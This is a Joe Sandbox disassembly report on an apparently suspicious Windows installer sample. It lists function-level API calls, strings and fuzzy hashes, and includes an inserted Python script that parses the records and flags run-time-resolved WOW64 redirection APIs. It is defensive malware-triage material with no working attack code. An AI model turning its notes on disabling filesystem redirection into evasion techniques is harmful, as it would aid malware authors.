• Source File: 00000000.00000002.1812314642.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
Similarity
• API ID: DialogThreadTimer$KillResumeSuspend
• String ID:
• API String ID: 4151135813-0
APIs
• ??3@YAXPAX@Z.MSVCRT(004177C4,004177C4,004177C4,00000000,00000024,;!@InstallEnd@!,;!@Install@!UTF-8!,00000000,00000000), ref: 00404E85
  • Part of subcall function 00404343: ??3@YAXPAX@Z.MSVCRT(?,?,?,004177C4,004177C4,?,;!@InstallEnd@!,;!@Install@!UTF-8!,00000000,00000000), ref: 004043B6
• ??3@YAXPAX@Z.MSVCRT(004177C4,004177C4,004177C4,00000000,00000024,004177C4,004177C4,00000000,00000024,;!@InstallEnd@!,;!@Install@!UTF-8!,00000000,00000000), ref: 00404EAB
• wsprintfA.USER32 ref: 00404EBC
Strings
Memory Dump Source
• Source File: 00000000.00000002.1812314642.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
Similarity
• API ID: ??3@$wsprintf
• String ID: :Language:%u!$;!@Install@!UTF-8!$;!@InstallEnd@!
• API String ID: 2704270482-1550708412
APIs
• ??3@YAXPAX@Z.MSVCRT(00417788,00417788,00000000,%%T\,0041350C,00000000,00417788,00407405,?,00000000,00000000,00000000), ref: 004038C6
• ??3@YAXPAX@Z.MSVCRT(00417788,00417788,00000000,%%T/,004134FC,00000000,00417788,00000000,%%T\,0041350C,00000000,00417788,00407405,?,00000000,00000000), ref: 00403904
• ??3@YAXPAX@Z.MSVCRT(00417788,00417788,00000000,00417788,00417788,00000000,%%T/,004134FC,00000000,00417788,00000000,%%T\,0041350C,00000000,00417788,00407405), ref: 0040392A
• ??3@YAXPAX@Z.MSVCRT(00000000,00417788,00417788,00000000,00417788,00417788,00000000,%%T/,004134FC,00000000,00417788,00000000,%%T\,0041350C,00000000,00417788), ref: 00403932
Strings
Memory Dump Source
• Source File: 00000000.00000002.1812314642.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
Similarity
• API ID: ??3@
• String ID: %%T/$%%T\
• API String ID: 613200358-2679640699
APIs
• ??3@YAXPAX@Z.MSVCRT(00414784,00414784,00000000,%%S\,0041350C,00000000,00414784,00407405,?,00000000,00000000,00000000), ref: 00403981
• ??3@YAXPAX@Z.MSVCRT(00414784,00414784,00000000,%%S/,004134FC,00000000,00414784,00000000,%%S\,0041350C,00000000,00414784,00407405,?,00000000,00000000), ref: 004039BF
• ??3@YAXPAX@Z.MSVCRT(00414784,00414784,00000000,00414784,00414784,00000000,%%S/,004134FC,00000000,00414784,00000000,%%S\,0041350C,00000000,00414784,00407405), ref: 004039E5
• ??3@YAXPAX@Z.MSVCRT(00000000,00414784,00414784,00000000,00414784,00414784,00000000,%%S/,004134FC,00000000,00414784,00000000,%%S\,0041350C,00000000,00414784), ref: 004039ED
Strings
Memory Dump Source
• Source File: 00000000.00000002.1812314642.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
Similarity
• API ID: ??3@
• String ID: %%S/$%%S\
• API String ID: 613200358-358529586
APIs
• ??3@YAXPAX@Z.MSVCRT(00414784,00414784,00000000,%%M\,0041350C,00000000,00414784,00407405,?,00000000,00000000,00000000), ref: 00403A3C
• ??3@YAXPAX@Z.MSVCRT(00414784,00414784,00000000,%%M/,004134FC,00000000,00414784,00000000,%%M\,0041350C,00000000,00414784,00407405,?,00000000,00000000), ref: 00403A7A
• ??3@YAXPAX@Z.MSVCRT(00414784,00414784,00000000,00414784,00414784,00000000,%%M/,004134FC,00000000,00414784,00000000,%%M\,0041350C,00000000,00414784,00407405), ref: 00403AA0
• ??3@YAXPAX@Z.MSVCRT(00000000,00414784,00414784,00000000,00414784,00414784,00000000,%%M/,004134FC,00000000,00414784,00000000,%%M\,0041350C,00000000,00414784), ref: 00403AA8
Strings
Memory Dump Source
• Source File: 00000000.00000002.1812314642.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                            Similarity
                                                                                            • API ID: ??3@
                                                                                            • String ID: %%M/$%%M\
                                                                                            • API String ID: 613200358-4143866494
                                                                                            • Opcode ID: 3eb134fca1680c0093703720a533bafa1d2fd801437f3d80c27f205d784cf8f2
                                                                                            • Instruction ID: 5f6947e2f47a7d655e02fb84317d9747a35bc7200d49f7273ebe403b31479b31
                                                                                            • Opcode Fuzzy Hash: 3eb134fca1680c0093703720a533bafa1d2fd801437f3d80c27f205d784cf8f2
                                                                                            • Instruction Fuzzy Hash: C911AD3190410EBACF05FFA1D956CEDBB79AE00708F51806AB511760E1EF78A789DB58
                                                                                            APIs
                                                                                            • _CxxThrowException.MSVCRT(00000000,00414CFC), ref: 0040E4EE
                                                                                            Strings
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000000.00000002.1812314642.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                            • Associated: 00000000.00000002.1812300314.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                                            • Associated: 00000000.00000002.1812332677.0000000000413000.00000002.00000001.01000000.00000003.sdmp
                                                                                            • Associated: 00000000.00000002.1812348112.0000000000417000.00000004.00000001.01000000.00000003.sdmp
                                                                                            • Associated: 00000000.00000002.1812362563.000000000041A000.00000002.00000001.01000000.00000003.sdmp
                                                                                            • Associated: 00000000.00000002.1812362563.0000000000424000.00000002.00000001.01000000.00000003.sdmp
                                                                                            • Associated: 00000000.00000002.1812362563.0000000000432000.00000002.00000001.01000000.00000003.sdmp
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_0_2_400000_ErbgterT2R.jbxd
                                                                                            Similarity
                                                                                            • API ID: ExceptionThrow
                                                                                            • String ID: $JA$4JA$DJA$TJA$hJA$xJA
                                                                                            • API String ID: 432778473-803145960
                                                                                            • Opcode ID: 8cab838d89dd1577677f775eaf8cb930bb6d64206a7fe5cceb0cff601651d84b
                                                                                            • Instruction ID: 5492ea6659e041f1bcf420c4685f7038b08242b420f8f2c51a6428b2159ddc92
                                                                                            • Opcode Fuzzy Hash: 8cab838d89dd1577677f775eaf8cb930bb6d64206a7fe5cceb0cff601651d84b
                                                                                            • Instruction Fuzzy Hash: 7211A5F0541B419BC7308F16E544587FBF8AF907587218A1FD0AA9BA51D3F8A1888B9C
                                                                                            APIs
                                                                                              • Part of subcall function 0040BA46: ??2@YAPAXI@Z.MSVCRT(0000000C,?,0040C20C,004149B0,00000001,?,?,00000000), ref: 0040BA4B
                                                                                            • ??3@YAXPAX@Z.MSVCRT(00000000,004149B0,00000001,?,?,00000000), ref: 0040C20D
                                                                                              • Part of subcall function 0040ADC3: ??2@YAPAXI@Z.MSVCRT(?,?,?,?,0040B1B6,00010000), ref: 0040ADD6
                                                                                              • Part of subcall function 0040ADC3: memmove.MSVCRT(00000000,?,?,?,?,?,0040B1B6,00010000), ref: 0040ADF0
                                                                                              • Part of subcall function 0040ADC3: ??3@YAXPAX@Z.MSVCRT(?,?,?,?,0040B1B6,00010000), ref: 0040AE00
                                                                                            • ??2@YAPAXI@Z.MSVCRT(00000014,00000000,004149B0,00000001,?,?,00000000), ref: 0040C245
                                                                                            Strings
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000000.00000002.1812314642.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                            • Associated: 00000000.00000002.1812300314.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                                            • Associated: 00000000.00000002.1812332677.0000000000413000.00000002.00000001.01000000.00000003.sdmp
                                                                                            • Associated: 00000000.00000002.1812348112.0000000000417000.00000004.00000001.01000000.00000003.sdmp
                                                                                            • Associated: 00000000.00000002.1812362563.000000000041A000.00000002.00000001.01000000.00000003.sdmp
                                                                                            • Associated: 00000000.00000002.1812362563.0000000000424000.00000002.00000001.01000000.00000003.sdmp
                                                                                            • Associated: 00000000.00000002.1812362563.0000000000432000.00000002.00000001.01000000.00000003.sdmp
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_0_2_400000_ErbgterT2R.jbxd
                                                                                            Similarity
                                                                                            • API ID: ??2@$??3@$memmove
                                                                                            • String ID: IA$IA$IA
                                                                                            • API String ID: 4294387087-924693538
                                                                                            • Opcode ID: 3ef1446a3f9eae3cfdc2853b922aca3bc2f9cc2cd28dfb990552d7283ffc15f1
                                                                                            • Instruction ID: 38d37476858cbe2739f158cf8086d9562841ccd83740beefedbf55b6536d6dac
                                                                                            • Opcode Fuzzy Hash: 3ef1446a3f9eae3cfdc2853b922aca3bc2f9cc2cd28dfb990552d7283ffc15f1
                                                                                            • Instruction Fuzzy Hash: 20B1C1B1900209DFCB54EFAAC8819DEBBB5BF48304F50852EF919A7291DB38A945CF54
                                                                                            APIs
                                                                                            • _CxxThrowException.MSVCRT(00100EC3,00414CFC), ref: 0040E83C
                                                                                            • ??2@YAPAXI@Z.MSVCRT(?,IA,IA,00000000,?,0040E909,00000000,00408769,IA,00402F92,00000000,00000000,004044E9,?,?,?), ref: 0040E864
                                                                                            • memcpy.MSVCRT(00000000,?,?,IA,IA,00000000,?,0040E909,00000000,00408769,IA,00402F92,00000000,00000000,004044E9,?), ref: 0040E88D
                                                                                            • ??3@YAXPAX@Z.MSVCRT(?,IA,IA,00000000,?,0040E909,00000000,00408769,IA,00402F92,00000000,00000000,004044E9,?,?,?), ref: 0040E898
                                                                                            Strings
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000000.00000002.1812314642.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                            • Associated: 00000000.00000002.1812300314.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                                            • Associated: 00000000.00000002.1812332677.0000000000413000.00000002.00000001.01000000.00000003.sdmp
                                                                                            • Associated: 00000000.00000002.1812348112.0000000000417000.00000004.00000001.01000000.00000003.sdmp
                                                                                            • Associated: 00000000.00000002.1812362563.000000000041A000.00000002.00000001.01000000.00000003.sdmp
                                                                                            • Associated: 00000000.00000002.1812362563.0000000000424000.00000002.00000001.01000000.00000003.sdmp
                                                                                            • Associated: 00000000.00000002.1812362563.0000000000432000.00000002.00000001.01000000.00000003.sdmp
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_0_2_400000_ErbgterT2R.jbxd
                                                                                            Similarity
                                                                                            • API ID: ??2@??3@ExceptionThrowmemcpy
                                                                                            • String ID: IA
                                                                                            • API String ID: 3462485524-3293647318
                                                                                            • Opcode ID: 6b78721643db57d5e00a8af36ebe01533f1ba9cf87e040577b2ff72779c9c95d
                                                                                            • Instruction ID: e9362666a157510f6fc1816af10740f0f0ab3f4ff6eb75305f8b2a096945a613
                                                                                            • Opcode Fuzzy Hash: 6b78721643db57d5e00a8af36ebe01533f1ba9cf87e040577b2ff72779c9c95d
                                                                                            • Instruction Fuzzy Hash: 6811E5736003009BCB28AF57D880D6BFBE9AB84354714C83FEA59A7290D779E8954794
                                                                                            APIs
                                                                                            Strings
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000000.00000002.1812314642.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                            • Associated: 00000000.00000002.1812300314.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                                            • Associated: 00000000.00000002.1812332677.0000000000413000.00000002.00000001.01000000.00000003.sdmp
                                                                                            • Associated: 00000000.00000002.1812348112.0000000000417000.00000004.00000001.01000000.00000003.sdmp
                                                                                            • Associated: 00000000.00000002.1812362563.000000000041A000.00000002.00000001.01000000.00000003.sdmp
                                                                                            • Associated: 00000000.00000002.1812362563.0000000000424000.00000002.00000001.01000000.00000003.sdmp
                                                                                            • Associated: 00000000.00000002.1812362563.0000000000432000.00000002.00000001.01000000.00000003.sdmp
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_0_2_400000_ErbgterT2R.jbxd
                                                                                            Similarity
                                                                                            • API ID: wsprintf$ExitProcesslstrcat
                                                                                            • String ID: 0x%p
                                                                                            • API String ID: 2530384128-1745605757
                                                                                            • Opcode ID: beb3389330693802dd4b40a551927b7f0c9c9e0999a7fc1e7fc7f64098bb755c
                                                                                            • Instruction ID: 6c9eba3c29ae2a0cc7ccd16f79f39b6d6218d418ab2b897ff95ca6c62132cda7
                                                                                            • Opcode Fuzzy Hash: beb3389330693802dd4b40a551927b7f0c9c9e0999a7fc1e7fc7f64098bb755c
                                                                                            • Instruction Fuzzy Hash: CF019E7580020CAFDB20AFA0DC45FDA777CBF44305F04486AF945A2081D738F6948FAA
                                                                                            APIs
                                                                                              • Part of subcall function 004071B8: GetSystemMetrics.USER32(0000000B), ref: 004071E0
                                                                                              • Part of subcall function 004071B8: GetSystemMetrics.USER32(0000000C), ref: 004071E9
                                                                                            • GetSystemMetrics.USER32(00000007), ref: 00407A51
                                                                                            • GetSystemMetrics.USER32(00000007), ref: 00407A62
                                                                                            • ??3@YAXPAX@Z.MSVCRT(?,000004B8,?,?), ref: 00407B29
                                                                                            Strings
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000000.00000002.1812314642.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                            • Associated: 00000000.00000002.1812300314.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                                            • Associated: 00000000.00000002.1812332677.0000000000413000.00000002.00000001.01000000.00000003.sdmp
                                                                                            • Associated: 00000000.00000002.1812348112.0000000000417000.00000004.00000001.01000000.00000003.sdmp
                                                                                            • Associated: 00000000.00000002.1812362563.000000000041A000.00000002.00000001.01000000.00000003.sdmp
                                                                                            • Associated: 00000000.00000002.1812362563.0000000000424000.00000002.00000001.01000000.00000003.sdmp
                                                                                            • Associated: 00000000.00000002.1812362563.0000000000432000.00000002.00000001.01000000.00000003.sdmp
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_0_2_400000_ErbgterT2R.jbxd
                                                                                            Similarity
                                                                                            • API ID: MetricsSystem$??3@
                                                                                            • String ID: 100%%
                                                                                            • API String ID: 2562992111-568723177
                                                                                            • Opcode ID: 8625fd62ee8a1587f51b59dec5492359d41c9a7e7955315cbfbb4a3169dab2fe
                                                                                            • Instruction ID: d2e8aa6d75c6757367bbc63d1236441fd7733528c0e5853e38aed7656a5d7d9b
                                                                                            • Opcode Fuzzy Hash: 8625fd62ee8a1587f51b59dec5492359d41c9a7e7955315cbfbb4a3169dab2fe
                                                                                            • Instruction Fuzzy Hash: 0D31D771A047059FCB24DFA9C9419AEB7F4EF40308B00012EE542A26E1DB78FE44CF99
                                                                                            APIs
                                                                                            • wsprintfW.USER32 ref: 00407A12
                                                                                              • Part of subcall function 0040725A: GetDlgItem.USER32(?,?), ref: 00407264
                                                                                              • Part of subcall function 0040725A: GetWindowTextLengthW.USER32(00000000), ref: 0040726B
                                                                                            • GetDlgItem.USER32(?,000004B3), ref: 004079C6
                                                                                              • Part of subcall function 00402D7D: GetWindowTextLengthW.USER32(?), ref: 00402D8E
                                                                                              • Part of subcall function 00402D7D: GetWindowTextW.USER32(00402E07,00000000,00000001), ref: 00402DAB
                                                                                            • ??3@YAXPAX@Z.MSVCRT(?,00000000), ref: 004079E4
                                                                                            Strings
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000000.00000002.1812314642.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                            • Associated: 00000000.00000002.1812300314.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                                            • Associated: 00000000.00000002.1812332677.0000000000413000.00000002.00000001.01000000.00000003.sdmp
                                                                                            • Associated: 00000000.00000002.1812348112.0000000000417000.00000004.00000001.01000000.00000003.sdmp
                                                                                            • Associated: 00000000.00000002.1812362563.000000000041A000.00000002.00000001.01000000.00000003.sdmp
                                                                                            • Associated: 00000000.00000002.1812362563.0000000000424000.00000002.00000001.01000000.00000003.sdmp
                                                                                            • Associated: 00000000.00000002.1812362563.0000000000432000.00000002.00000001.01000000.00000003.sdmp
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_0_2_400000_ErbgterT2R.jbxd
                                                                                            Similarity
                                                                                            • API ID: TextWindow$ItemLength$??3@wsprintf
                                                                                            • String ID: (%u%s)
                                                                                            • API String ID: 3595513934-2496177969
                                                                                            • Opcode ID: 81108d5736a162b6d9564d3eb7a2e93f5e39dd0108d0485d36b03b99dec63073
                                                                                            • Instruction ID: 1b031bef2a273fddd3247fbc9e57f9590cc69a100d620b238320e5a3a24b3f72
                                                                                            • Opcode Fuzzy Hash: 81108d5736a162b6d9564d3eb7a2e93f5e39dd0108d0485d36b03b99dec63073
                                                                                            • Instruction Fuzzy Hash: 1401C8B15042147FDB107B65DC46EAF777CAF44708F10807FF516A21E2DB7CA9448A68
                                                                                            APIs
                                                                                            • LoadLibraryA.KERNEL32(kernel32,GetNativeSystemInfo,0000003C,?,?,?,?,?,?,00406130,?,00000000,?,?,?), ref: 0040220A
                                                                                            • GetProcAddress.KERNEL32(00000000), ref: 00402211
                                                                                            Strings
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000000.00000002.1812314642.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                            • Associated: 00000000.00000002.1812300314.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                                            • Associated: 00000000.00000002.1812332677.0000000000413000.00000002.00000001.01000000.00000003.sdmp
                                                                                            • Associated: 00000000.00000002.1812348112.0000000000417000.00000004.00000001.01000000.00000003.sdmp
                                                                                            • Associated: 00000000.00000002.1812362563.000000000041A000.00000002.00000001.01000000.00000003.sdmp
                                                                                            • Associated: 00000000.00000002.1812362563.0000000000424000.00000002.00000001.01000000.00000003.sdmp
                                                                                            • Associated: 00000000.00000002.1812362563.0000000000432000.00000002.00000001.01000000.00000003.sdmp
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_0_2_400000_ErbgterT2R.jbxd
                                                                                            Similarity
                                                                                            • API ID: AddressLibraryLoadProc
                                                                                            • String ID: GetNativeSystemInfo$kernel32
                                                                                            • API String ID: 2574300362-3846845290
                                                                                            • Opcode ID: dcc7844bde5d914e3d472255d944d602bbefc6ee0fc65a521985863f2fff9548
                                                                                            • Instruction ID: b757a3d5c4c17e34abb063926c294d8abaed4bc4edbc3347b9308a3de004b423
                                                                                            • Opcode Fuzzy Hash: dcc7844bde5d914e3d472255d944d602bbefc6ee0fc65a521985863f2fff9548
                                                                                            • Instruction Fuzzy Hash: 88F0B432E1521495CF20BBF48B0D6EF66E89A19349B1004BBD852F31D0E5FCCE8141EE
                                                                                            APIs
                                                                                            • LoadLibraryA.KERNEL32(kernel32,Wow64RevertWow64FsRedirection,004061B1,?,?,?), ref: 00402198
                                                                                            • GetProcAddress.KERNEL32(00000000), ref: 0040219F
                                                                                            Strings
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000000.00000002.1812314642.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                            • Associated: 00000000.00000002.1812300314.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                                            • Associated: 00000000.00000002.1812332677.0000000000413000.00000002.00000001.01000000.00000003.sdmp
                                                                                            • Associated: 00000000.00000002.1812348112.0000000000417000.00000004.00000001.01000000.00000003.sdmp
                                                                                            • Associated: 00000000.00000002.1812362563.000000000041A000.00000002.00000001.01000000.00000003.sdmp
                                                                                            • Associated: 00000000.00000002.1812362563.0000000000424000.00000002.00000001.01000000.00000003.sdmp
                                                                                            • Associated: 00000000.00000002.1812362563.0000000000432000.00000002.00000001.01000000.00000003.sdmp
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_0_2_400000_ErbgterT2R.jbxd
                                                                                            Similarity
                                                                                            • API ID: AddressLibraryLoadProc
                                                                                            • String ID: Wow64RevertWow64FsRedirection$kernel32
                                                                                            • API String ID: 2574300362-3900151262
                                                                                            • Opcode ID: e5c6d40c89fc1f3fb34c79c32c3445fbc861d0d884c7149ba98d4f5b826d618a
                                                                                            • Instruction ID: b94e249185ae4a70534d65e1a66e6cdcdba3a47a1e4784fabdbc91f5644b18b3
                                                                                            • Opcode Fuzzy Hash: e5c6d40c89fc1f3fb34c79c32c3445fbc861d0d884c7149ba98d4f5b826d618a
                                                                                            • Instruction Fuzzy Hash: AFD0C934294201DBDB125FA0EE0E7EA3AB9FB04B0BF458035A920A00F0CBBC9644CA5C
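The three preceding function records resolve GetNativeSystemInfo, Wow64RevertWow64FsRedirection and Wow64DisableWow64FsRedirection at run time through LoadLibraryA/GetProcAddress rather than importing them. On 64-bit Windows a 32-bit process runs under WOW64, where GetNativeSystemInfo reports the real processor architecture and the two Wow64*FsRedirection calls switch the System32 -> SysWOW64 redirection off and back on, so the sample can reach the 64-bit system directory; that combination is worth pulling out of a report automatically. The Python script below is an added example, not part of the Joe Sandbox report or of the analysed sample: it parses the "APIs" records in the plain-text form shown on this page, pairs each LoadLibrary* call with the record's String ID field to recover which exports are resolved dynamically, and flags the WOW64-related ones. The sample input is constructed from the records on this page with indentation and the memory-dump, API ID and hash fields removed; the watch list WOW64_FS_APIS and all function names are the example's own.

```python
"""Parse Joe Sandbox 'APIs' records (text form) and flag run-time resolved exports."""
import re
from dataclasses import dataclass, field
from typing import List, Optional, Tuple

# Call line, e.g. "• LoadLibraryA.KERNEL32(kernel32,GetNativeSystemInfo,?), ref: 0040220A",
# "• wsprintfW.USER32 ref: 00407A12" or "• Part of subcall function 0040725A: X.USER32(?), ref: ...".
API_RE = re.compile(
    r"^•\s*(?:Part of subcall function (?P<sub>[0-9A-F]{8}): )?"
    r"(?P<name>[^\s(]+?)\.(?P<module>[A-Z0-9]+)"
    r"(?:\((?P<args>.*)\))?\s*,?\s*ref:\s*(?P<ref>[0-9A-F]{8})$"
)

@dataclass
class Call:
    name: str
    module: str
    args: List[str]            # stack slots as printed by the sandbox; "?" = unknown
    ref: str                   # address of the call instruction
    subcall_of: Optional[str]  # set for "Part of subcall function X" lines

@dataclass
class Record:
    calls: List[Call] = field(default_factory=list)
    string_id: str = ""        # '$'-separated string literals the function references

def parse_records(text: str) -> List[Record]:
    """Split the text at each 'APIs' header and collect calls and String ID."""
    records: List[Record] = []
    current: Optional[Record] = None
    for raw in text.splitlines():
        line = raw.strip()
        if line == "APIs":
            current = Record()
            records.append(current)
            continue
        if current is None:
            continue
        m = API_RE.match(line)
        if m:
            args = [a for a in (m["args"] or "").split(",") if a]
            current.calls.append(Call(m["name"], m["module"], args, m["ref"], m["sub"]))
        elif line.startswith("• String ID:"):
            current.string_id = line.split(":", 1)[1].strip()
    return records

LOADLIB = {"LoadLibraryA", "LoadLibraryW", "LoadLibraryExA", "LoadLibraryExW"}

def dynamic_imports(records: List[Record]) -> List[Tuple[str, str, str]]:
    """(library, export, ref) for each LoadLibrary*/GetProcAddress pair in a record.
    The export name is the record's String ID minus the library name; in the records
    on this page it also appears as the stack slot printed right after the library,
    since GetProcAddress's second argument is pushed before LoadLibraryA is called."""
    found = []
    for rec in records:
        if not any(c.name == "GetProcAddress" for c in rec.calls):
            continue
        for load in rec.calls:
            if load.name not in LOADLIB or not load.args:
                continue
            library = load.args[0]
            for literal in filter(None, rec.string_id.split("$")):
                if literal.lower() != library.lower():
                    found.append((library, literal, load.ref))
    return found

# Watch list chosen for this example: under WOW64, GetNativeSystemInfo reports the real
# architecture and the Wow64*FsRedirection pair turns System32 -> SysWOW64 redirection off/on.
WOW64_FS_APIS = {"GetNativeSystemInfo", "Wow64DisableWow64FsRedirection",
                 "Wow64RevertWow64FsRedirection"}

def wow64_findings(records: List[Record]) -> List[str]:
    """Sorted watch-list exports that the sample resolves dynamically."""
    return sorted({e for _, e, _ in dynamic_imports(records)} & WOW64_FS_APIS)

# Constructed input: four records from this page, with indentation and the
# memory-dump, API ID and hash fields removed.
SAMPLE = """\
APIs
• LoadLibraryA.KERNEL32(kernel32,GetNativeSystemInfo,0000003C,?,?,?,?,?,?,00406130,?,00000000,?,?,?), ref: 0040220A
• GetProcAddress.KERNEL32(00000000), ref: 00402211
• String ID: GetNativeSystemInfo$kernel32
APIs
• LoadLibraryA.KERNEL32(kernel32,Wow64RevertWow64FsRedirection,004061B1,?,?,?), ref: 00402198
• GetProcAddress.KERNEL32(00000000), ref: 0040219F
• String ID: Wow64RevertWow64FsRedirection$kernel32
APIs
• LoadLibraryA.KERNEL32(kernel32,Wow64DisableWow64FsRedirection,0040223A), ref: 004021CA
• GetProcAddress.KERNEL32(00000000), ref: 004021D1
• String ID: Wow64DisableWow64FsRedirection$kernel32
APIs
• wsprintfW.USER32 ref: 00407A12
  • Part of subcall function 0040725A: GetDlgItem.USER32(?,?), ref: 00407264
• ??3@YAXPAX@Z.MSVCRT(?,00000000), ref: 004079E4
• String ID: (%u%s)
"""

if __name__ == "__main__":
    recs = parse_records(SAMPLE)
    for lib, export, ref in dynamic_imports(recs):
        print(f"{ref}: {lib}!{export} resolved through GetProcAddress")
    print("WOW64-related:", wow64_findings(recs))
```

Run against the full text of a report the script lists one line per dynamically resolved export with the address of the LoadLibraryA call, and the watch list can be extended to whatever other run-time-resolved APIs a triage wants surfaced. The String ID field is used rather than the printed stack slots because the slots after the first argument are just whatever happened to be on the stack and are not guaranteed to hold the export name.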
                                                                                            APIs
                                                                                            • LoadLibraryA.KERNEL32(kernel32,Wow64DisableWow64FsRedirection,0040223A), ref: 004021CA
                                                                                            • GetProcAddress.KERNEL32(00000000), ref: 004021D1
                                                                                            Strings
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000000.00000002.1812314642.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                             • Associated: 00000000.00000002.1812300314.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                                             • Associated: 00000000.00000002.1812332677.0000000000413000.00000002.00000001.01000000.00000003.sdmp
                                                                                             • Associated: 00000000.00000002.1812348112.0000000000417000.00000004.00000001.01000000.00000003.sdmp
                                                                                             • Associated: 00000000.00000002.1812362563.000000000041A000.00000002.00000001.01000000.00000003.sdmp
                                                                                             • Associated: 00000000.00000002.1812362563.0000000000424000.00000002.00000001.01000000.00000003.sdmp
                                                                                             • Associated: 00000000.00000002.1812362563.0000000000432000.00000002.00000001.01000000.00000003.sdmp
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_0_2_400000_ErbgterT2R.jbxd
                                                                                            Similarity
                                                                                            • API ID: AddressLibraryLoadProc
                                                                                            • String ID: Wow64DisableWow64FsRedirection$kernel32
                                                                                            • API String ID: 2574300362-736604160
                                                                                            • Opcode ID: 5a0f418ac3e49e57b967c4010738a21a45af66be6bd625357fa5c872d0fae828
                                                                                            • Instruction ID: 817513c890d082da38b6284c2862a66e2f32a8da2897575df7e5c1eb8648f331
                                                                                            • Opcode Fuzzy Hash: 5a0f418ac3e49e57b967c4010738a21a45af66be6bd625357fa5c872d0fae828
                                                                                            • Instruction Fuzzy Hash: 0DD012342443009BDB515FA09E0D7DA3EB4B705B07F508076A520E11D1CBFCA244C7AC
                                                                                            APIs
                                                                                            • ??3@YAXPAX@Z.MSVCRT(?,?,00000000,00000020,?,?,?,?,?,?,?,?,0040507C,?,00000000), ref: 00402B6F
                                                                                              • Part of subcall function 0040272E: MultiByteToWideChar.KERNEL32(00000020,00000000,00000024,?,00000000,?,?,00000020,00000024,00000000,00402ACD,?,?,00000000,00000000,00000000), ref: 00402760
                                                                                            • ??3@YAXPAX@Z.MSVCRT(?,00000000,00000000,00000000,00000020,?,?,?,?,?,?,?,?,0040507C,?,00000000), ref: 00402ADC
                                                                                            • ??3@YAXPAX@Z.MSVCRT(?,?,00000000,00000000,00000000,00000020,?,?,?,?,?,?,?,?,0040507C,?), ref: 00402AF7
                                                                                            • ??3@YAXPAX@Z.MSVCRT(?,?,?,00000000,00000000,00000000,00000020,?,?,?,?,?,?,?,?,0040507C), ref: 00402AFF
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000000.00000002.1812314642.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                             • Associated: 00000000.00000002.1812300314.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                                             • Associated: 00000000.00000002.1812332677.0000000000413000.00000002.00000001.01000000.00000003.sdmp
                                                                                             • Associated: 00000000.00000002.1812348112.0000000000417000.00000004.00000001.01000000.00000003.sdmp
                                                                                             • Associated: 00000000.00000002.1812362563.000000000041A000.00000002.00000001.01000000.00000003.sdmp
                                                                                             • Associated: 00000000.00000002.1812362563.0000000000424000.00000002.00000001.01000000.00000003.sdmp
                                                                                             • Associated: 00000000.00000002.1812362563.0000000000432000.00000002.00000001.01000000.00000003.sdmp
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_0_2_400000_ErbgterT2R.jbxd
                                                                                            Similarity
                                                                                            • API ID: ??3@$ByteCharMultiWide
                                                                                            • String ID:
                                                                                            • API String ID: 1731127917-0
                                                                                            • Opcode ID: ae4930b9035af11edc18eb83865398ea889af843cb2bb96c85f7d9ecca2ecb95
                                                                                            • Instruction ID: 3903ebf3ba6088976d83fc344d3b185d6a20d7f45533e28e7dbc13297377a7b4
                                                                                            • Opcode Fuzzy Hash: ae4930b9035af11edc18eb83865398ea889af843cb2bb96c85f7d9ecca2ecb95
                                                                                            • Instruction Fuzzy Hash: 2831B3729041156ACB14FFA6DD81DEFB3BCEF00714B51403FF952B31E1EA38AA458658
